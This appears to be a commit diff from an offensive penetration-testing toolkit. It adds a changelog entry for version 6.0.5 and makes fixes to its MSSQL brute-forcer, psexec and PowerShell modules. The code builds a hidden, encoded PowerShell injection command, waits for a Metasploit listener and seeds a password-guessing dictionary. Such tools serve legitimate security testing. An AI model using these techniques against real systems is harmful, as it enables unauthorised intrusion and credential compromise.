multiple bug fixes

readme/CHANGES

@@ -1,3 +1,13 @@
+~~~~~~~~~~~~~~~~
+version 6.0.5
+~~~~~~~~~~~~~~~~
+
+* fixed an issue with fasttrack built-in attack with RIDENUM - would not properly close built in brute force file causing an exception
+* converted powershell injection to use -win hidden instead of -win hid, for some reason some versions of Windows get mad and don't execute the code properly
+* fixed powershell injection in mssql bruter
+* added better upper/lower handling in options in mssql bruter
+* fixed an issue causing timing issues in mssql bruter powershell injection technique
+
 ~~~~~~~~~~~~~~~~
 version 6.0.4
 ~~~~~~~~~~~~~~~~

src/core/fasttrack.py

@@ -327,9 +327,10 @@ try:
             if dict == "":
                 # write out a file
                 filewrite = file(setdir + "/dictionary.txt", "w")
-                filewrite.write("\nPassword1")
+                filewrite.write("\nPassword1\nPassword!\nlc username")
                 # specify the path
                 dict = setdir + "/dictionary.txt"
+                filewrite.close()
 
             # if we are not brute forcing
             if dict.lower() == "no":

src/fasttrack/mssql.py

@@ -183,7 +183,7 @@ def deploy_hex2binary(ipaddr,port,username,password):
 
         x86 = file(setdir + "/x86.powershell", "r")
         x86 = x86.read()
-        x86 = "powershell -nop -win hid -noni -enc " + x86
+        x86 = "powershell -nop -win hidden -noni -enc " + x86
         print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
         filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
         filewrite.write(x86)
@@ -206,6 +206,8 @@ def deploy_hex2binary(ipaddr,port,username,password):
                 print_status("Waiting for the listener to start first before we continue forward...")
                 print_status("Be patient, Metaploit takes a little bit to start...")
                 child2.expect("Starting the payload handler", timeout=30000)
+                print_status("Metasploit started... Waiting a couple more seconds for listener to activate..")
+                time.sleep(5)
 
         # assign random_exe command to the powershell command
         random_exe = powershell_command

src/fasttrack/psexec.py

@@ -64,7 +64,7 @@ try:
 
     x86 = file(setdir + "/x86.powershell", "r")
     x86 = x86.read()
-    x86 = "powershell -nop -win hid -noni -enc " + x86
+    x86 = "powershell -nop -win hidden -noni -enc " + x86
     print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
     filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
     filewrite.write(x86)

src/powershell/powershell.py

@@ -40,7 +40,7 @@ if powershell_menu_choice != "99":
         # here we format everything for us
         x86 = file(setdir + "/x86.powershell", "r")
         x86 = x86.read()
-        x86 = "powershell -nop -win hid -noni -enc " + x86
+        x86 = "powershell -nop -win hidden -noni -enc " + x86
         print_status("If you want the powershell commands and attack, they are exported to %s/reports/powershell/" % (setdir))
         filewrite = file(setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
         filewrite.write(x86)